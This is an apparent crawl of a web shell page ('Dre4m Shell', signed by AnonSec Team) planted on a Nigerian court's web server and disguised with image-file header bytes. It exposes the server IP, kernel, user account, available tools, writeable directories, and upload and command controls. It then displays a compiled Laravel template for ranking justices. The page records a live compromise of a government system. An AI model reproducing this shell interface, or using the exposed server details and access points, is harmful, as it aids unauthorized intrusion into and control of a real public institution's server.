ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.139.81.143
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/e2c45a9e3bf52daccbf3d7327352d0a7ab24417d.php
<?php $__env->startSection('pageTitle'); ?>

<?php $__env->stopSection(); ?>
<?php $__env->startSection('content'); ?>
    <div class="box box-default">
        <div class="box-header with-border hidden-print">
           <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?></h3>
        </div>
        
     <!-- Validation messages -->   
                <?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong>
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>

                <?php if(session('msg')): ?>
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong>
                        <?php echo session('msg'); ?>

                    </div>
                <?php endif; ?>

                <?php if(session('err')): ?>
                    <div class="alert alert-warning alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error Occured!</strong>
                        <?php echo session('err'); ?>

                    </div>
                <?php endif; ?>
        
    <!-- End Validation Message -->        

        <!--MAIN FORM --->
            <div class="box-body">
                    <form method="post" action="<?php echo e(route('justicesrank.store')); ?>" id="form1">
                            <?php echo e(csrf_field()); ?>

                            <!--hidden field for creating record-->                                   
                    <div class="row">          	 
                        <div class="col-md-4">                                      	
                            <label>Justice Name</label> 
                            <select name="justiceName" id="" class="form-control">
                                <?php $__currentLoopData = $listjudges; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $judge): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <option value="<?php echo e($judge->ID); ?>"><?php echo e($judge->surname); ?> <?php echo e($judge->first_name); ?> <?php echo e($judge->othernames); ?></option>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </select>    
                        </div> 
                        <div class="col-md-4">                 
                            <label>Rank</label> 
                            <select name="judgeRank" id="judgeRank" class="form-control">
                                <?php for($i=1;$i<=500;$i++): ?>
                                    <option value="<?php echo e($i); ?>"><?php echo e($i); ?></option>
                                <?php endfor; ?>
                            </select>                   
                        </div> 
                        <div style="padding-top: 30px;">
                        	<button type="submit" name="button" class="btn btn-primary">Update</button>
                        </div>                       
                        <br>
                    </div>
                    </form>
                </div>
                <!--END OF MAIN FORM-->
            
                <br>
                <br>
            <div class="container">
                <table class="table table-hover table-striped table-bordered" style="overflow-x:auto;">
                    <caption style="color:#219C52; font-size:large; font-weight:bold; text-align:center;">Justices Rank</caption>
                    <thead style="font-weight:bold;" class="thead-light">
                        <tr>
                            <td>S/N</td>
                            <td>Name Justice </td>
                            <td>Rank</td>
                        </tr>
                    </thead>
                    
                    <tbody>
                         <?php $i = 1; ?>
                        <?php $__currentLoopData = $listjudges; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $judge): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <tr>
                            <td><?php echo e($i++); ?></td>
                            <td><?php echo e($judge->surname); ?> <?php echo e($judge->first_name); ?> <?php echo e($judge->othernames); ?></td> 
                            <td><?php echo e($judge->judge_rank); ?></td>   
                        </tr>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        
                    </tbody>
                </table>
            </div> 
            </div>
                                
<?php $__env->stopSection(); ?>
<?php $__env->startSection('scripts'); ?>

<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH C:\xampp\htdocs\nicngrp\resources\views/judges/index.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team